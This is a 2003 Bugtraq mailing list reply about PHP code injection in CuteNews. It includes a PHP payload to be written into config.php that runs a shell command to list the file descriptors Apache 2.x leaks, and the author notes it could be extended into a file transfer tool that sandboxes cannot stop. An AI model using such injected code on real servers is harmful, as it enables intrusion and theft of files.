Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PHP code injection in CuteNews

From: Steve Grubb <linux_4ever () yahoo com>
Date: 28 Feb 2003 22:18:05 -0000
In-Reply-To: <E18ndJT-000JS2-00 () f19 mail ru>

Hello,

If the cutenews website is running apache 2.x which
leaks descriptors to all kinds of things 
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2

Then you can do this:

config.php = 

<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
        $match = preg_split("/> /", $item);
        if ($match[1]) {
                if (preg_match("/\//", $match[1])) {
                        echo $match[1]; echo "<br>";
                }
        }
}
?> </body></html>

it doesn't take alot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect.

-Steve Grubb
Previous By Date Next
Previous By Thread Next

Current thread: